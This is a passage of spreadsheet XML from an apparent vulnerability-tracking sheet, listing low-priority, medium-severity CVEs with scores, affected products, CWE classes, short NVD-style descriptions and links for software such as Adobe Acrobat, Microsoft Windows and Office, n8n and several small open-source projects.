disclose sensitive information. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T1324" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81993</t></is></c></row><row r="1325"><c r="A1325" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1325" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1325" s="5" t="inlineStr"><is><t>CVE-2026-82001</t></is></c><c r="D1325" s="5" t="n"><v>5.5</v></c><c r="E1325" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1325" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1325" s="5" t="inlineStr" /><c r="H1325" s="5" t="n"><v>0.002</v></c><c r="I1325" s="5" t="inlineStr" /><c r="J1325" s="5" t="inlineStr" /><c r="K1325" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1325" s="5" t="inlineStr" /><c r="M1325" s="5" t="inlineStr" /><c r="N1325" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1325" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1325" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1325" s="5" t="inlineStr" /><c r="R1325" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="S1325" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an Uncontrolled Resource Consumption vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to exhaust system resources, resulting in an application denial-of-service condition. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T1325" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82001</t></is></c></row><row r="1326"><c r="A1326" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1326" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1326" s="5" t="inlineStr"><is><t>CVE-2026-83501</t></is></c><c r="D1326" s="5" t="n"><v>5.5</v></c><c r="E1326" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1326" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1326" s="5" t="inlineStr" /><c r="H1326" s="5" t="n"><v>0.003</v></c><c r="I1326" s="5" t="inlineStr" /><c r="J1326" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1326" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L1326" s="5" t="inlineStr" /><c r="M1326" s="5" t="inlineStr" /><c r="N1326" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1326" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1326" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1326" s="5" t="inlineStr" /><c r="R1326" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1326" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to disclose information locally.</t></is></c><c r="T1326" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83501</t></is></c></row><row r="1327"><c r="A1327" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1327" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1327" s="5" t="inlineStr"><is><t>CVE-2026-83949</t></is></c><c r="D1327" s="5" t="n"><v>5.5</v></c><c r="E1327" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1327" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1327" s="5" t="inlineStr" /><c r="H1327" s="5" t="n"><v>0.004</v></c><c r="I1327" s="5" t="inlineStr" /><c r="J1327" s="5" t="inlineStr" /><c r="K1327" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1327" s="5" t="inlineStr" /><c r="M1327" s="5" t="inlineStr" /><c r="N1327" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1327" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1327" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1327" s="5" t="inlineStr" /><c r="R1327" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1327" s="5" t="inlineStr"><is><t>Buffer over-read in Microsoft Office Word allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1327" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83949</t></is></c></row><row r="1328"><c r="A1328" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1328" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1328" s="5" t="inlineStr"><is><t>CVE-2026-83951</t></is></c><c r="D1328" s="5" t="n"><v>5.5</v></c><c r="E1328" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1328" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1328" s="5" t="inlineStr" /><c r="H1328" s="5" t="n"><v>0.004</v></c><c r="I1328" s="5" t="inlineStr" /><c r="J1328" s="5" t="inlineStr" /><c r="K1328" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1328" s="5" t="inlineStr" /><c r="M1328" s="5" t="inlineStr" /><c r="N1328" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1328" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1328" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1328" s="5" t="inlineStr" /><c r="R1328" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1328" s="5" t="inlineStr"><is><t>Buffer over-read in Microsoft Office Word allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1328" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83951</t></is></c></row><row r="1329"><c r="A1329" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1329" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1329" s="5" t="inlineStr"><is><t>CVE-2026-83991</t></is></c><c r="D1329" s="5" t="n"><v>5.5</v></c><c r="E1329" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1329" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1329" s="5" t="inlineStr" /><c r="H1329" s="5" t="n"><v>0.003</v></c><c r="I1329" s="5" t="inlineStr" /><c r="J1329" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1329"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329" s="5" t="inlineStr" /><c r="M1329" s="5" t="inlineStr" /><c r="N1329" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1329" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1329" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1329" s="5" t="inlineStr" /><c r="R1329" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S1329" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Windows Cloud Files Mini Filter Driver allows an authorized attacker to perform tampering locally.</t></is></c><c r="T1329" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83991</t></is></c></row><row r="1330"><c r="A1330" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1330" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1330" s="5" t="inlineStr"><is><t>CVE-2026-85875</t></is></c><c r="D1330" s="5" t="n"><v>5.5</v></c><c r="E1330" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1330" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1330" s="5" t="inlineStr" /><c r="H1330" s="5" t="n"><v>0.004</v></c><c r="I1330" s="5" t="inlineStr" /><c r="J1330" s="5" t="inlineStr" /><c r="K1330" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1330" s="5" t="inlineStr" /><c r="M1330" s="5" t="inlineStr" /><c r="N1330" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1330" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1330" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1330" s="5" t="inlineStr" /><c r="R1330" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1330" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1330" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85875</t></is></c></row><row r="1331"><c r="A1331" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1331" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1331" s="5" t="inlineStr"><is><t>CVE-2026-86084</t></is></c><c r="D1331" s="5" t="n"><v>5.5</v></c><c r="E1331" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1331" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1331" s="5" t="inlineStr" /><c r="H1331" s="5" t="n"><v>0.003</v></c><c r="I1331" s="5" t="inlineStr" /><c r="J1331" s="5" t="inlineStr" /><c r="K1331" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1331" s="5" t="inlineStr" /><c r="M1331" s="5" t="inlineStr" /><c r="N1331" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1331" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1331" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1331" s="5" t="inlineStr" /><c r="R1331" s="5" t="inlineStr"><is><t>CWE-288</t></is></c><c r="S1331" s="5" t="inlineStr"><is><t>n8n is an open source workflow automation platform. Prior to 1.123.76, 2.37.7, and 2.38.2, the public OIDC login and callback endpoints completed authentication even when OIDC was not the enabled active authentication method. An Enterprise administrator who had configured and later disabled an identity provider still exposed a working route that could issue valid sessions. The affected logic is packages/cli/src/modules/sso-oidc/oidc.service.ee.ts, including generateLoginUrl and the callback flow that lacked assertOidcLoginEnabled. This issue is fixed in versions 1.123.76, 2.37.7 and 2.38.2.</t></is></c><c r="T1331" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86084</t></is></c></row><row r="1332"><c r="A1332" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1332" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1332" s="5" t="inlineStr"><is><t>CVE-2026-86511</t></is></c><c r="D1332" s="5" t="n"><v>5.5</v></c><c r="E1332" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1332" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1332" s="5" t="inlineStr" /><c r="H1332" s="5" t="n"><v>0.004</v></c><c r="I1332" s="5" t="inlineStr" /><c r="J1332" s="5" t="inlineStr" /><c r="K1332" s="5" t="inlineStr" /><c r="L1332" s="5" t="inlineStr" /><c r="M1332" s="5" t="inlineStr" /><c r="N1332" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1332" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1332" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1332" s="5" t="inlineStr" /><c r="R1332" s="5" t="inlineStr"><is><t>CWE-400, CWE-404</t></is></c><c r="S1332" s="5" t="inlineStr"><is><t>A vulnerability was found in java-json-tools jackson-coreutils 2.0. Affected by this vulnerability is the function BigDecimal.toPlainString of the file src/main/java/com/github/fge/jackson/JacksonUtils.java. Performing a manipulation results in resource consumption. The attack may be initiated remotely. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="T1332" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86511</t></is></c></row><row r="1333"><c r="A1333" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1333" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1333" s="5" t="inlineStr"><is><t>CVE-2026-86513</t></is></c><c r="D1333" s="5" t="n"><v>5.5</v></c><c r="E1333" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1333" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1333" s="5" t="inlineStr" /><c r="H1333" s="5" t="n"><v>0.004</v></c><c r="I1333" s="5" t="inlineStr" /><c r="J1333" s="5" t="inlineStr" /><c r="K1333" s="5" t="inlineStr" /><c r="L1333" s="5" t="inlineStr" /><c r="M1333" s="5" t="inlineStr" /><c r="N1333" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1333" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1333" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1333" s="5" t="inlineStr" /><c r="R1333" s="5" t="inlineStr"><is><t>CWE-400, CWE-770</t></is></c><c r="S1333" s="5" t="inlineStr"><is><t>A security flaw has been discovered in java-json-tools jackson-coreutils 2.0. This vulnerability affects the function TreePointer.tokensFromInput of the file src/main/java/com/github/fge/jackson/jsonpointer/TreePointer.java of the component JSON Pointer parser. The manipulation results in allocation of resources. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="T1333" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86513</t></is></c></row><row r="1334"><c r="A1334" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1334" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1334" s="5" t="inlineStr"><is><t>CVE-2026-86519</t></is></c><c r="D1334" s="5" t="n"><v>5.5</v></c><c r="E1334" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1334" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1334" s="5" t="inlineStr" /><c r="H1334" s="5" t="n"><v>0.003</v></c><c r="I1334" s="5" t="inlineStr" /><c r="J1334" s="5" t="inlineStr" /><c r="K1334" s="5" t="inlineStr" /><c r="L1334" s="5" t="inlineStr" /><c r="M1334" s="5" t="inlineStr" /><c r="N1334" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1334" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1334" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1334" s="5" t="inlineStr" /><c r="R1334" s="5" t="inlineStr"><is><t>CWE-200, CWE-284</t></is></c><c r="S1334" s="5" t="inlineStr"><is><t>A vulnerability was found in code-projects Student Crud Operation 1.0. This impacts an unknown function of the file /card_activation.sql of the component Backup File Handler. The manipulation results in information disclosure. The attack can be launched remotely. The exploit has been made public and could be used.</t></is></c><c r="T1334" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86519</t></is></c></row><row r="1335"><c r="A1335" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1335" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1335" s="5" t="inlineStr"><is><t>CVE-2026-86665</t></is></c><c r="D1335" s="5" t="n"><v>5.5</v></c><c r="E1335" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1335" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1335" s="5" t="inlineStr" /><c r="H1335" s="5" t="n"><v>0.004</v></c><c r="I1335" s="5" t="inlineStr" /><c r="J1335" s="5" t="inlineStr" /><c r="K1335" s="5" t="inlineStr" /><c r="L1335" s="5" t="inlineStr" /><c r="M1335" s="5" t="inlineStr" /><c r="N1335" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1335" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1335" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1335" s="5" t="inlineStr" /><c r="R1335" s="5" t="inlineStr"><is><t>CWE-862, CWE-863</t></is></c><c r="S1335" s="5" t="inlineStr"><is><t>A vulnerability was identified in aircheng-org iWebShop-5 up to 5.15. This issue affects the function Update::index of the file controllers/update.php. The manipulation leads to missing authorization. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="T1335" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86665</t></is></c></row><row r="1336"><c r="A1336" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1336" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1336" s="5" t="inlineStr"><is><t>CVE-2026-86666</t></is></c><c r="D1336" s="5" t="n"><v>5.5</v></c><c r="E1336" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1336" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1336" s="5" t="inlineStr" /><c r="H1336" s="5" t="n"><v>0.005</v></c><c r="I1336" s="5" t="inlineStr" /><c r="J1336" s="5" t="inlineStr" /><c r="K1336" s="5" t="inlineStr" /><c r="L1336" s="5" t="inlineStr" /><c r="M1336" s="5" t="inlineStr" /><c r="N1336" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1336" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1336" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1336" s="5" t="inlineStr" /><c r="R1336" s="5" t="inlineStr"><is><t>CWE-284, CWE-434</t></is></c><c r="S1336" s="5" t="inlineStr"><is><t>A security flaw has been discovered in aircheng-org iWebShop-5 up to 5.15. Impacted is the function upload_json/uploadFile of the file controllers/pic.php. The manipulation results in unrestricted upload. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="T1336" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86666</t></is></c></row><row r="1337"><c r="A1337" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1337" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1337" s="5" t="inlineStr"><is><t>CVE-2026-86669</t></is></c><c r="D1337" s="5" t="n"><v>5.5</v></c><c r="E1337" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1337" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1337" s="5" t="inlineStr" /><c r="H1337" s="5" t="n"><v>0.004</v></c><c r="I1337" s="5" t="inlineStr" /><c r="J1337" s="5" t="inlineStr" /><c r="K1337" s="5" t="inlineStr" /><c r="L1337" s="5" t="inlineStr" /><c r="M1337" s="5" t="inlineStr" /><c r="N1337" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1337" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1337" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1337" s="5" t="inlineStr" /><c r="R1337" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S1337" s="5" t="inlineStr"><is><t>A vulnerability was detected in aircheng-org iWebShop-5 up to 5.15. This affects the function Login of the file controllers/systemseller.php. Performing a manipulation of the argument Name results in improper authentication. It is possible to initiate the attack remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="T1337" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86669</t></is></c></row><row r="1338"><c r="A1338" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1338" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1338" s="5" t="inlineStr"><is><t>CVE-2026-86672</t></is></c><c r="D1338" s="5" t="n"><v>5.5</v></c><c r="E1338" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1338" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1338" s="5" t="inlineStr" /><c r="H1338" s="5" t="n"><v>0.003</v></c><c r="I1338" s="5" t="inlineStr" /><c r="J1338" s="5" t="inlineStr" /><c r="K1338" s="5" t="inlineStr" /><c r="L1338" s="5" t="inlineStr" /><c r="M1338" s="5" t="inlineStr" /><c r="N1338" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1338" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1338" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1338" s="5" t="inlineStr" /><c r="R1338" s="5" t="inlineStr"><is><t>CWE-200, CWE-284</t></is></c><c r="S1338" s="5" t="inlineStr"><is><t>A vulnerability has been found in ningzichun Student Management System up to 98760f5711cf6dc8b4adca53a9e207ca49b02ebf. Affected is an unknown function of the file example.7z of the component Backup Handler. The manipulation leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="T1338" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86672</t></is></c></row><row r="1339"><c r="A1339" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1339" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1339" s="5" t="inlineStr"><is><t>CVE-2026-86673</t></is></c><c r="D1339" s="5" t="n"><v>5.5</v></c><c r="E1339" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1339" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1339" s="5" t="inlineStr" /><c r="H1339" s="5" t="n"><v>0.003</v></c><c r="I1339" s="5" t="inlineStr" /><c r="J1339" s="5" t="inlineStr"><is><t>mysql</t></is></c><c r="K1339" s="5" t="inlineStr" /><c r="L1339" s="5" t="inlineStr" /><c r="M1339" s="5" t="inlineStr" /><c r="N1339" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1339" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1339" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1339" s="5" t="inlineStr" /><c r="R1339" s="5" t="inlineStr"><is><t>CWE-259, CWE-798</t></is></c><c r="S1339" s="5" t="inlineStr"><is><t>A vulnerability was determined in ningzichun Student Management System up to 98760f5711cf6dc8b4adca53a9e207ca49b02ebf. Affected by this issue is the function mysqli_connect of the file config/database.php of the component Database Connection. This manipulation causes hard-coded credentials. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="T1339" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86673</t></is></c></row><row r="1340"><c r="A1340" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1340" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1340" s="5" t="inlineStr"><is><t>CVE-2026-86716</t></is></c><c r="D1340" s="5" t="n"><v>5.5</v></c><c r="E1340" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1340" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1340" s="5" t="inlineStr" /><c r="H1340" s="5" t="n"><v>0.003</v></c><c r="I1340" s="5" t="inlineStr" /><c r="J1340" s="5" t="inlineStr" /><c r="K1340" s="5" t="inlineStr" /><c r="L1340" s="5" t="inlineStr" /><c r="M1340" s="5" t="inlineStr" /><c r="N1340" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1340" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1340" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1340" s="5" t="inlineStr" /><c r="R1340" s="5" t="inlineStr"><is><t>CWE-119, CWE-122</t></is></c><c r="S1340" s="5" t="inlineStr"><is><t>A vulnerability was determined in Cesanta mJS up to 1.26. Affected is the function skip_spaces_and_comments of the file src/mjs_tok.c. Executing a manipulation can lead to heap-based buffer overflow. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="T1340" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86716</t></is></c></row><row r="1341"><c r="A1341" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1341" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1341" s="5" t="inlineStr"><is><t>CVE-2026-86808</t></is></c><c r="D1341" s="5" t="n"><v>5.5</v></c><c r="E1341" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1341" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1341" s="5" t="inlineStr" /><c r="H1341" s="5" t="n"><v>0.006</v></c><c r="I1341" s="5" t="inlineStr" /><c r="J1341" s="5" t="inlineStr" /><c r="K1341" s="5" t="inlineStr" /><c r="L1341" s="5" t="inlineStr" /><c r="M1341" s="5" t="inlineStr" /><c r="N1341" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1341" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1341" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1341" s="5" t="inlineStr" /><c r="R1341" s="5" t="inlineStr"><is><t>CWE-287, CWE-306</t></is></c><c r="S1341" s="5" t="inlineStr"><is><t>A security vulnerability has been detected in moltis-org moltis up to 20260818.10. The affected element is the function vault_unlock_handler/vault_recovery_handler of the file vault.rs. Such manipulation leads to missing authentication. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 20260819.01 is sufficient to fix this issue. The name of the patch is 3b92dd64d5648f829968cf48bf67dc3113852fef. Upgrading the affected component is advised.</t></is></c><c r="T1341" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86808</t></is></c></row><row r="1342"><c r="A1342" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1342" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1342" s="5" t="inlineStr"><is><t>CVE-2025-64542</t></is></c><c r="D1342" s="5" t="n"><v>5.4</v></c><c r="E1342" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1342" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1342" s="5" t="inlineStr" /><c r="H1342" s="5" t="n"><v>0.003</v></c><c r="I1342" s="5" t="inlineStr" /><c r="J1342" s="5" t="inlineStr" /><c r="K1342" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1342" s="5" t="inlineStr" /><c r="M1342" s="5" t="inlineStr" /><c r="N1342" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1342" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1342" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1342" s="5" t="inlineStr" /><c r="R1342" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S134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42" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64542</t></is></c></row><row r="1343"><c r="A1343" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1343" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1343" s="5" t="inlineStr"><is><t>CVE-2025-64584</t></is></c><c r="D1343" s="5" t="n"><v>5.4</v></c><c r="E1343" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1343" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1343" s="5" t="inlineStr" /><c r="H1343" s="5" t="n"><v>0.003</v></c><c r="I1343" s="5" t="inlineStr" /><c r="J1343" s="5" t="inlineStr" /><c r="K1343" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1343" s="5" t="inlineStr" /><c r="M1343" s="5" t="inlineStr" /><c r="N1343" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1343" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1343" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1343" s="5" t="inlineStr" /><c r="R1343" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1343"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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64584</t></is></c></row><row r="1344"><c r="A1344" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1344" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1344" s="5" t="inlineStr"><is><t>CVE-2025-64588</t></is></c><c r="D1344" s="5" t="n"><v>5.4</v></c><c r="E1344" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1344" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1344" s="5" t="inlineStr" /><c r="H1344" s="5" t="n"><v>0.003</v></c><c r="I1344" s="5" t="inlineStr" /><c r="J1344" s="5" t="inlineStr" /><c r="K1344" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1344" s="5" t="inlineStr" /><c r="M1344" s="5" t="inlineStr" /><c r="N1344" s="5" t="inlineStr"><is><t>NVD</t></is></c><c 